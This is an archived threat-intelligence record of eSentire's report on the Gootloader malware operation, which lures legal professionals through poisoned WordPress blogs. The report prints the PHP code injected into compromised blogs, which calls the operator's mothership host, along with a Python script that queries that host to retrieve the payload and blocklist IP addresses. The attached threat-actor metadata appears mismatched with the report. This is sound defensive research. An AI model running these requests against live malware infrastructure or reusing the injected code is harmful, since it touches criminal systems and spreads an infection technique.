{
	"id": "5e84f4e3-e432-4e9a-a94f-c307601fd8bd",
	"created_at": "2026-04-06T00:14:20.109428Z",
	"updated_at": "2026-04-10T03:23:51.473212Z",
	"deleted_at": null,
	"sha1_hash": "6c95786208d07de30ed2c945bf02f4996ef2db7e",
	"title": "Gootloader Unloaded: Researchers Launch Multi-Pronged Offensive Against Gootloader, Cutting Off Traffic to Thousands of…",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7877885,
	"plain_text": "Gootloader Unloaded: Researchers Launch Multi-Pronged\r\nOffensive Against Gootloader, Cutting Off Traffic to Thousands\r\nof…\r\nArchived: 2026-04-05 17:15:03 UTC\r\neSentire Encourages Security Defenders to Follow their Lead\r\nExecutive Summary\r\neSentire’s Threat Response Unit (TRU), led by researchers Joe Stewart and Keegan Keplinger, has launched a\r\nmulti-pronged offensive against a growing cyberthreat: the Gootloader Initial Access-as-a-Service\r\nOperation. The Gootloader Operation is an expansive cybercrime business, and it has been active since 2018. For\r\nthe past 15 months, the Gootloader Operator has been launching ongoing attacks targeting legal professionals\r\nworking for both law firms and corporate legal departments in the U.S., Canada, the U.K. and Australia. Between\r\nJanuary and March 2023, TRU shut down Gootloader attacks against 12 different organizations, seven of which\r\nwere law firms.\r\nWhile Gootloader might not be a household name like many ransomware threats, the Gootloader Operation is\r\ncompromising organizations across the globe and selling this access to ransomware threat actors and other\r\ncybercriminals. Since Gootloader is a “Gateway to Hands-on Intrusions”, not just annoying, automated adware,\r\nhackers use it to get a foothold in an organization’s IT environment and then spread laterally through the\r\norganization’s network to seed out ransomware or to exfiltrate data.\r\nThe Gootloader Operation is targeting law firms and law professionals because that's where they can find the most\r\nsensitive data that most people want to be kept confidential. It is the kind of data that can damage reputations,\r\ncompromise business deals, expose protected witnesses, and undermine an organization’s legal case. 
The\r\nCybersecurity and Infrastructure Security Agency (CISA) named it a top malware strain of 2021.\r\nBy using Search Engine Optimization (SEO) poisoning to lure unsuspecting victims to an enormous array of\r\ncompromised WordPress blogs, Gootloader tailors its victim pool to a subset of organizations most likely to pay a\r\nhandsome ransom. Currently, one of these “victim pools” is legal professionals working for law firms and\r\ncorporate legal departments.\r\nGootloader infects legal employees by luring them to blogs, which are populated with content pertaining to “legal\r\nagreements” and “contracts”. When the employee visits the blog, which includes a link to what appears to be a\r\nsample “legal agreement” or “contract”, and they download the file, they are downloading Gootloader.\r\nOne of the most interesting aspects of Stewart and Keplinger’s research was that they were able to use the\r\nGootloader page data to confirm the connection that other security researchers had previously reported: that the\r\nGootloader Operator(s) had been providing Initial Access victims to the notorious Russian-speaking REvil (aka:\r\nhttps://www.esentire.com/web-native-pages/gootloader-unloaded\r\nPage 1 of 12\n\nSodinokibi) Gang. Not only were Stewart and Keplinger able to confirm this connection, but they were also able\r\nto narrow down the timelines of all the REvil-sponsored Gootloader campaigns to the day.\r\nStewart and Keplinger set out to figure out a way of shutting down the growing Gootloader infections, and it\r\nturned out that the Gootloader malware operator, himself, has provided part of the answer. The Operator\r\nimplemented a feature to keep his payloads from being discovered by security researchers and incident\r\nresponders. 
Stewart and Keplinger discovered that they and other security defenders can use this same tactic to\r\nhide end-users from the Gootloader Operator, thus proactively protecting organizations from being infected.\r\nStewart also built a crawler for finding all the live Gootloader webpages, and eSentire is providing technical\r\ndetails needed to identify these pages with search engine vendors with the goal of blocking these malicious pages,\r\nthus preventing end-users from ever seeing them. This is another way eSentire is proactively trying to protect\r\ncorporate end-users from being infected with Gootloader. eSentire is sharing its methods at the RSA Security\r\nConference in San Francisco the week of April 24th and is encouraging other security defenders to follow its lead.\r\nIntroduction\r\nThe Gootloader Initial Access-as-a-Service operation is an expansive cybercrime business and it has been active\r\nsince 2018. For the past 15 months, the Gootloader Operator has been launching ongoing attacks targeting legal\r\nprofessionals working for both law firms and corporate legal departments in the U.S., Canada, the U.K. and\r\nAustralia. Between January and March 2023, TRU shut down Gootloader attacks against 12 different\r\norganizations, seven of which were law firms.\r\nGootloader might not have a household name like many ransomware threats; however, it is the Gootloader\r\nOperation that is compromising organizations across the globe and selling this access to ransomware threat actors\r\nand other cybercriminals.\r\nSince the Gootloader malware is used as a “Gateway to Hands-on Intrusions”, hackers use it to get a foothold\r\nin an organization’s IT environment and then spread laterally through the organization’s network to seed out\r\nransomware or to exfiltrate data. Gootloader targets law firms and law professionals because that's where they can\r\nfind the most sensitive data that most people want kept confidential. 
It is the kind of data that can damage\r\nreputations, compromise business deals, expose protected witnesses, and undermine an organization’s legal case.\r\nThe Cybersecurity and Infrastructure Security Agency (CISA) named it a top malware strain of 2021.\r\nREvil Ransomware Gang and the Gootloader Operator(s) – Partners in Crime\r\nOne of the most interesting aspects of Stewart and Keplinger’s research was that they were able to use the\r\nGootloader page data to confirm the connection that other security researchers had previously reported: that the\r\nGootloader Operator(s) had been providing Initial Access victims to the notorious Russian-speaking REvil (aka:\r\nSodinokibi) Gang. Not only were Stewart and Keplinger able to confirm this connection, but they were also able\r\nto narrow down the timelines of all the REvil-sponsored Gootloader campaigns to the day.\r\nREvil is infamous for launching some of the most destructive ransomware attacks worldwide. They not only\r\nattacked private businesses, but they also went after corporations and organizations that are part of critical\r\ninfrastructure sectors. These victims included JBS S.A., the world’s largest meat processing company. The attack\r\ntemporarily shut down their operations in the U.S., Canada, and Australia. According to JBS USA CEO Andre\r\nNogueira, the company paid the REvil threat actors US $11 million in an attempt to “avoid any unforeseen issues\r\nand ensure no data was exfiltrated.”\r\nA second critical infrastructure organization and victim of REvil was Kaseya, a global provider of unified IT \u0026\r\nsecurity management software for IT professionals working as managed service providers (MSPs) and mid-market\r\nenterprises (MMEs). 
MSPs use Kaseya’s solutions to monitor the IT infrastructure for their end-user companies.\r\nSpecifically, the REvil attackers released a fake software update from Kaseya via an authentication bypass\r\nvulnerability, which then spread malware to Kaseya’s MSP customers and then on to their end-user customers.\r\nThe Kaseya attack was a “supply chain ransomware attack”, giving the REvil threat actors access to thousands of\r\ndownstream companies via Kaseya’s network of MSP customers.\r\nStewart and Keplinger have discovered that the Gootloader Operator(s) worked with REvil from 2019 through\r\nJuly 2022. What Stewart and Keplinger have uncovered is that during certain timeframes, the REvil Gang\r\nlaunched ransomware campaigns against speakers of specific languages (Figure 1).\r\nIt was the same language(s) that the Gootloader Operators targeted and during the same time segments as when\r\nthe REvil attacks occurred. For example, in 2019, Gootloader heavily targeted Korean speakers when looking for\r\ntheir Initial Access victims. It was also in 2019 that the REvil Gang began infecting companies in South Korea\r\nwith their ransomware, and they continued these attacks throughout 2019.\r\nFigure 1 - Languages targeted by Gootloader malware between 2019-2023\r\nLikewise, in 2020, TRU found evidence showing that the Gootloader Operator(s) began heavily targeting English\r\nand German speakers and continued focusing on these two victim pools throughout 2021. Coincidentally, the REvil\r\nGang was seen attacking German-based organizations and organizations in the U.S., Canada, Australia, and the\r\nU.K. from 2020 through 2021. From the beginning of 2022 and up until September 2022, both Gootloader and\r\nREvil continued targeting English speakers.\r\nCoincidentally, from 2022 to the present, Gootloader has focused largely on English speakers looking for legal\r\nagreements. 
This specific targeting certainly provides cybercriminals, like REvil, with a pool of extremely high-value victims—law firm employees and employees of corporate legal departments.\r\nIn November 2021, the U.S. Department of the Treasury said the REvil Ransomware Gang had received more\r\nthan USD $200 million in extortion payments, and that their malware had been “deployed” against approximately\r\n175,000 computers worldwide. Stewart and Keplinger believe, with high confidence, that the Gootloader\r\nOperator’s “act of continually feeding victims” to the REvil Gang was absolutely integral to REvil’s success and\r\ntheir ability to extort USD $200 million from their victims. And because Gootloader continues to rack up victims\r\ndaily in the U.S., Canada, the U.K., and Australia, Stewart and Keplinger feel that it is very possible the\r\nGootloader Operator is working with another ransomware gang or continuing to work with members of the REvil\r\nGang, who are simply operating under a different group name.\r\nGootloader’s Modus Operandi\r\nBy using Search Engine Optimization (SEO) poisoning to lure unsuspecting victims to an enormous array of\r\ncompromised WordPress blogs, Gootloader tailors its victim pool to a subset of organizations most likely to pay a\r\nhandsome ransom. 
One of these “victim pools” is legal professionals working for law firms and corporate legal\r\ndepartments.\r\nGootloader infects legal employees by luring them to blogs, which are populated with content pertaining to “legal\r\nagreements” and “contracts.” The employee visits the blog, which includes a link to what appears to be a sample\r\n“legal agreement” or “contract” and when they go to download the file, they are downloading Gootloader (Figure\r\n2).\r\nAs mentioned previously, legal professionals have been a primary target of the Gootloader Operator for the past\r\n15 months, and between January and March 2023, TRU shut down Gootloader attacks against 12 different\r\norganizations, seven of which were law firms.\r\nFigure 2 - Gootloader landing page from a compromised WordPress blog\r\nGootloader’s Origins\r\nThe name Gootloader emerged in 2020 to classify a specific component of the Gootkit malware, largely because\r\nsecurity researchers felt it was unique enough to be classified independently of its primary payload. Gootkit is a\r\nmuch older trojan that first emerged in 2010 (contrary to several published analyses, dating it to 2014).\r\nGootkit was a sophisticated banking trojan that targeted financial institutions in Europe, specifically Germany,\r\nAustria, and Switzerland. 
The trojan was distributed via phishing emails and malicious websites and it had the\r\nability to steal sensitive financial information, including bank login credentials and credit card data.\r\nGootloader was designed to deliver a range of other types of malware to infect systems, including ransomware,\r\nbanking trojans, and spyware. Gootkit is alleged to be authored by a Russian developer known as “MZђ”.\r\nGootkit Creator Doxxed by the Author of the Infamous Gameover Zeus Banking\r\nTrojan, Evgeniy Bogachev?\r\nInterestingly, an administrator of the KernelMode forum known as “EP_X0FF” doxxed the Gootkit author in a\r\nforum post, alleging that his real name was Denis Turin, a Russian developer from Tomsk, Russia, later residing in\r\nSt. Petersburg (Figure 3).\r\nFigure 3 - KernelMode post doxxing the Gootkit author\r\nEven more interesting is the fact that EP_X0FF himself has been alleged to be none other than the author of the\r\ninfamous Zeus trojan, Evgeniy Bogachev (Figure 4). Bogachev is also the author of the popular banking trojan,\r\nGameover Zeus. Security experts estimate that Gameover Zeus is responsible for more than 1 million computer\r\ninfections, resulting in financial losses of more than USD $100 million.\r\nOn May 19, 2014, Bogachev was indicted by a federal grand jury in the Western District of Pennsylvania on\r\ncharges of conspiracy, computer fraud, wire fraud, bank fraud, and money laundering. 
The FBI has a USD $3\r\nmillion reward for information leading to Bogachev’s arrest.\r\nFigure 4 - Blog comment alleging EP_X0FF is the author of the Zeus Trojan\r\nNote: no evidence was provided by the commenter “Dimitri” who stated EP_X0FF is Bogachev, and it has since\r\nbeen disputed by a security researcher at Kaspersky Lab.\r\neSentire’s Threat Response Unit (TRU) has uncovered independent evidence linking a circa-2010 Gootkit\r\nCommand and Control Server (C2) to the same individual, alleged by EP_X0FF, to be the Gootkit author, as well\r\nas other pseudonyms such as “freeeez,” “UnW1n,” “ZuwizarD,” and “Patolog.”\r\nHowever, it is possible that the Gootkit/Gootloader code may have changed hands over the last 13 years of its\r\nevolution, so it is unknown if this individual is still currently operating the Gootloader service (Figure 5).\r\nFigure 5 - Evidence linking Gootkit to its alleged author\r\nGootloader’s Stealthy Tactics of Keeping Victims in the Dark\r\nGootloader manages to keep its pool of compromised WordPress blogs producing fresh victims for years in most\r\ncases by using stealth tactics and only showing computer users the malware-laden landing pages under certain\r\ncircumstances.\r\nThe malicious payloads are never displayed to logged-in users of the WordPress site, meaning that the site\r\nadministrators usually have no idea that their blog is compromised and that it is acting as part of the Gootloader\r\nmalware network. 
The IP addresses of the administrators (and several netblocks above and below their IP\r\naddresses) are also blocked, preventing them from viewing the malicious pages on a second visit, even if they are\r\nlogged-out.\r\nThe blocklisting features of Gootloader are also incorporated into the Gootloader “mothership,” the server that\r\ndelivers the malicious payloads to the compromised blog for display to the end-user. Each visitor will only receive\r\nthe payload once, then the IP is blocked by the mothership server for 24 hours – across all Gootloader-compromised blogs.\r\nThis tactic is effective at stymying security researchers or incident response teams to a certain degree, at least until\r\nthey hop on a VPN and try loading the malicious blog post again. However, security teams can use this feature\r\nto their advantage in order to proactively protect their end-users from Gootloader infections.\r\nTurning the Tables: Using Gootloader’s Blocklisting Feature to Protect End-Users\r\nEach time a non-blocked visitor loads a malicious post from a compromised Gootloader blog, specific code is\r\nexecuted on the server, relaying information about the request to the Gootloader mothership:\r\n$request = @wp_remote_retrieve_body(@wp_remote_get(\r\n \"http://my-game.biz/index.php?a=\" . base64_encode($_GET[$qwc4]) . '\u0026b=' . 
base64_encode($\r\n array(\"timeout\" =\u003e 120)\r\n )\r\n );\r\nThe variables sent in this request are:\r\nA number representing the specific document being viewed by the end-user (likely relayed as a way for the\r\nGootloader author to keep track of which SEO terms are the most effective)\r\nThe IP address of the visiting user (for Geofencing by country and for blocking subsequent requests for one\r\nfull day)\r\nThe browser user-agent string (for use in targeting specific platforms only)\r\nThe HTTP referrer if any\r\nThe Gootloader mothership relies on the compromised blog to tell it the IP address of the visiting user, which it\r\nhas no way of knowing directly. Therefore, it is possible to blocklist any IPv4 address on the Internet from seeing\r\nany malicious Gootloader landing page on the Internet for 24 hours by specially crafting a request to the\r\nGootloader mothership and carefully emulating the above request.\r\nActive Defense\r\nPython code can be used to emulate the PHP traffic from the compromised blog to the Gootloader mothership,\r\nretrieving the malicious payload and getting any desired IPv4 address added to the blocklist.\r\n#!/usr/bin/env python3\r\nfrom collections import OrderedDict\r\nfrom base64 import b64encode\r\nimport requests\r\nimport sys\r\nif len(sys.argv) != 5:\r\n print(f\"Usage: {sys.argv[0]} \u003ccompromised blog domain\u003e \u003cWordPress version\u003e \u003carticle ID\u003e \u003cIP to ge\r\n print(f\"Example: {sys.argv[0]} jonas.fi 5.8.6 2268444 1.1.1.1\")\r\n sys.exit(1)\r\nurl = 'http://my-game.biz/index.php' # Gootloader mothership\r\ndomain = sys.argv[1]\r\nwp_version = sys.argv[2]\r\narticle = b64encode(sys.argv[3].encode()).decode()\r\nIP = b64encode(sys.argv[4].encode()).decode()\r\nc = b64encode(b'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/11\r\nd = '' # referrer, not always present\r\nreq = 
f\"{url}?a={article}\u0026b={IP}\u0026c={c}\u0026d=\"\r\nheaders = OrderedDict([\r\n ('User-Agent', f\"WordPress/{wp_version}; https://{domain}\"),\r\n ('Accept', '*/*'),\r\n ('Accept-Encoding', 'identity'),\r\n ('Referer', req)\r\n])\r\nprint(f\"Sending: {req}\")\r\nresponse = requests.get(req, headers=headers)\r\nprint(response.content)\r\nThe first request made should output the base64-encoded obfuscated Gootloader landing-page payload. A second\r\nrequest made within 12 hours using the same parameters should return an empty response – this indicates the IP\r\nsent in the request was added to the Gootloader blocklist.\r\nOther Active Defense Vectors\r\nThere are additional layers to Gootloader’s blocklist. While we do not have the source code to the Gootloader\r\nmothership, we have observed that in certain cases, Gootloader will not only block the reported IP, but an entire\r\nrange of netblocks above and below that IP address, over 5000 IP addresses in total.\r\nTheoretically, if we can get any chosen IP address added to this more restrictive blocklist, it would only take just\r\nover 800,000 requests to the Gootloader mothership every 24 hours to effectively inoculate 100% of Gootloader’s\r\npotential victim pool by blocking the entire global IPv4 network space by choosing IP addresses at appropriate\r\nnumeric intervals.\r\nAnother layer is abusing the blocklist that is part of the code injected into the compromised WordPress blogs. This\r\nblocklist only impacts logged-in users, so it would not be applicable to all the Gootloader landing pages; however,\r\nsome subset of the compromised sites have user registration enabled or use third-party OAUTH logins. 
Visiting\r\none of the landing pages on such a site, from carefully chosen proxy IP addresses, could allow defenders to block\r\na large swath of the Internet from being infected by the site, and in this case, the blocklist is permanent.\r\neSentire is actively using the defense methods described above to protect its customers. Since implementing these\r\nmeasures, eSentire has not observed any occurrences where our MDR for Network customers have downloaded\r\nGootloader. eSentire is also partnering across its ecosystem and collaborating with technology alliance partners to\r\nensure widespread communication and adoption of these recommendations.\r\nAs mentioned previously, since 2020 the Gootloader Operator has used Search Engine Optimization (SEO)\r\npoisoning to lure unsuspecting victims to thousands of compromised WordPress blogs. Many of these blogs\r\ncontain hundreds of malicious web pages which lead to Gootloader malware.\r\nStewart has located 375,000 malicious URLs across thousands of blogs that have been hijacked by Gootloader.\r\nEnd-users, especially legal professionals, are lured to the blog pages because they are populated with content\r\npertaining to “legal agreements” and “contracts.” The employee visits the blog, goes to download a sample “legal\r\nagreement” or “contract” and they end up downloading Gootloader.\r\nStewart built a crawler for finding all the live Gootloader web pages, and eSentire is providing technical details\r\nneeded to identify these pages with top search engine vendors with the goal of blocking these malicious pages,\r\nthus preventing end-users from ever seeing them.\r\nBeating Gootloader at its Own Game – Taking a Bite Out of the Malware Supply\r\nChain\r\nNo doubt the Gootloader author will read this paper and consider the ramifications to his operation, especially if\r\nthe techniques described are adopted by other MSSPs and security organizations.\r\nAs security researchers, we are continually faced with the same 
dilemma when publishing countermeasures\r\nagainst malware services – is it better to keep the information secret and hope the malware operator does not\r\nevolve tactics? Or do we share it with the world in hopes of protecting as many people as possible and raising\r\nawareness about the scope of the threat?\r\nSince we have decided to publish the details of the countermeasure, the malware author now has a decision to\r\nmake. First, he needs to consider whether he can detect our injected blocklist IPs coming from a wide range of sources,\r\nand whether he should remove or modify the global blocklisting feature.\r\nAt some point, it becomes an escalating game of cat-and-mouse. Whitehats can employ greater resources to evade\r\nthe available detection measures he may deploy, so ultimately the Gootloader author may need to eliminate the\r\nblocklist or greatly shorten its duration.\r\nEither way, this will be a net win for safety and security, as researchers will more easily be able to detect and\r\nreport the malicious landing pages to the impacted WordPress blog administrators and anti-phishing and browser\r\nblocklists, which will ultimately impact Gootloader and its ransomware customers’ bottom line.\r\nKeep Watch for Gootloader’s Indicators of Compromise (IOCs) and Modus\r\nOperandi (MO)\r\n“It is critical for companies’ security teams to quickly identify and remediate Gootloader infections within their\r\nenvironment to prevent follow-on attacks and the deployment of more damaging malware such as ransomware or\r\nCobalt Strike,” said Keplinger. 
“Being aware of the hacker group’s typical MO, for example, infection process and\r\ntheir IOCs, are key to identifying and shutting down a Gootloader attack.”\r\nGootloader’s Typical Infection Process\r\nUser performs a web search for a document or document template\r\nUser clicks on search result leading to Gootloader landing page\r\nLanding page presents a fake web forum and link to the requested document\r\nUser clicks on the presented link, and receives a Zip archive\r\nUser opens the archive, finds a JavaScript file (.js extension) disguised as the requested document\r\nUser executes the JavaScript file by double-clicking it\r\nWindows executes the JavaScript file using the Windows script host process, resulting in the execution of\r\nthe Gootloader malware\r\nA repository of URLs for current LIVE Gootloader web pages can be found here.\r\neSentire would like to thank the author of the GootloaderSites feed for his assistance with this research. For more\r\ninformation on Gootloader IOCs, follow his blog at https://gootloader.wordpress.com/ and subscribe to his feed on\r\nMastodon at https://ioc.exchange/@GootloaderSites.\r\nDefending Your Company and Employees Against Gootloader\r\nThe Gootloader hackers ensnare their victims because they fool them into downloading documents from\r\nthe Web. Therefore, one of the most important defenses companies can implement against Gootloader is\r\nsecurity awareness training for their employees.\r\nCompanies must educate employees regarding the risk of Gootloader, and more broadly, the security risks\r\ninvolved with using search engines to find and download free document templates.\r\nEmployees need to make sure they can trust document sources. 
Even legitimate Word and Excel documents\r\nfrom the Internet can lead to malware.\r\nBe wary of Word and Excel documents sent from an unknown source or acquired from the Internet that\r\nprompt you to ‘Enable Macros’.\r\nEmployees need to ensure that the content downloaded is content they intended to download. If one\r\ndownloads a document from the Internet but is served a JavaScript file, one should not open it. It\r\nshould be escalated to one’s internal IT security team.\r\nEnsure standard procedures are in place for employees to submit potentially malicious content for review.\r\nUse Windows Attack Surface Reduction rules to block JavaScript and VBScript from launching\r\ndownloaded content.\r\nEmploy an Endpoint Detection and Response (EDR) solution.\r\nEngage 24/7 threat detection, investigation, and response for continuous security monitoring, complete\r\nvisibility across the attack surface, and access to highly certified security experts.\r\nIf you’re not currently engaged with a Managed Detection and Response provider, we highly recommend you\r\npartner with eSentire MDR to build resilience and disrupt threats before they impact your business.\r\nWant to learn more about how we protect legal firms globally? Connect with an eSentire Security Specialist.\r\nSource: https://www.esentire.com/web-native-pages/gootloader-unloaded",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/web-native-pages/gootloader-unloaded"
	],
	"report_names": [
		"gootloader-unloaded"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434460,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c95786208d07de30ed2c945bf02f4996ef2db7e.pdf",
		"text": "https://archive.orkl.eu/6c95786208d07de30ed2c945bf02f4996ef2db7e.txt",
		"img": "https://archive.orkl.eu/6c95786208d07de30ed2c945bf02f4996ef2db7e.jpg"
	}
}